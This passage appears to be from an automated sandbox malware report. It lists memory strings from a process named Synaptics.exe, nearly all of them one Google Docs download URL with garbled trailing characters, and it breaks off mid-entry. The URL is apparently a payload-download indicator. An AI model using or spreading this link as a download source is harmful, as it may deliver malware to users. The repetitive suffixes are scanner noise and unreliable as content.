                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-1
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-F
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-i
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.0
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.E
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c)
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cY
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.gvt2
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.oZ4
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.use
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.x
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.you7
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/E
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4141841776.000000000F0D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/I
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/h
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download00
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download02
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0B
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0G
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0Z
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0fZ
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0k
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4141841776.000000000F0D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1638Z
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1K
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1c
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1h
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1j
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1v
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1~
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.2572800198.000000003BBB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download24122
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2J
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2u
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3N
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4122
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download49I
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4A
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4L
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4kV
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4w
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5E
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5b
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5g
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.0000000005660000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.2572800198.000000003BBB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6D
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6O
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download73
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7H
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7gU
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8F
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8eR
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9J
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9a
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9f
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9iS
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9k
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:0
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:I
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:R
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:hP
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;lQ
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;tex
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 